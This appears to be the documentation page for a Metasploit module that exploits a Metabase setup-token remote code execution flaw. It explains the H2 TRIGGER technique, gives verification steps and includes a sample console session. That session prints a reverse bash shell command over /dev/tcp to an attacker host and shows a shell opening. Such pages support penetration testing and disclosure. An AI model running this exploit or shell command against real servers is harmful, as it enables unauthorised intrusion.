h00die
1.8 KiB
1.8 KiB
Vulnerable Application
Metabase versions before 0.46.6.1 contain a flaw where the secret setup-token is accessible even after the setup process has been completed. With this token a user is able to submit the setup functionality to create a new database. When creating a new database, an H2 database string is created with a TRIGGER that allows for code execution. We use a sample database for our connection string to prevent corrupting real databases.
Successfully tested against Metabase 0.46.6.
Install
docker run -d -p 3000:3000 --name metabase metabase/metabase:v0.46.6
Verification Steps
- Install the application
- Start msfconsole
- Do:
use exploit/linux/http/metabase_setup_token_rce - Do:
set rhosts [ip] - Do:
run - You should get a shell.
Options
Scenarios
Metabase 0.46.6 on Docker
msf6 > use exploit/linux/http/metabase_setup_token_rce
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(linux/http/metabase_setup_token_rce) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf6 exploit(linux/http/metabase_setup_token_rce) > set lhost 111.111.11.111
lhost => 111.111.11.111
msf6 exploit(linux/http/metabase_setup_token_rce) > set verbose true
verbose => true
msf6 exploit(linux/http/metabase_setup_token_rce) > exploit
[+] bash -c '0<&46-;exec 46<>/dev/tcp/111.111.11.111/4444;sh <&46 >&46 2>&46'
[*] Started reverse TCP handler on 111.111.11.111:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version Detected: 0.46.6
[+] Found setup token: 45a2c97a-97f5-4a89-8f37-769b13411d16
[*] Sending exploit
[*] Command shell session 1 opened (111.111.11.111:4444 -> 222.22.2.2:55650) at 2023-07-28 12:48:47 +0000
id
uid=2000(metabase) gid=2000(metabase) groups=2000(metabase),2000(metabase)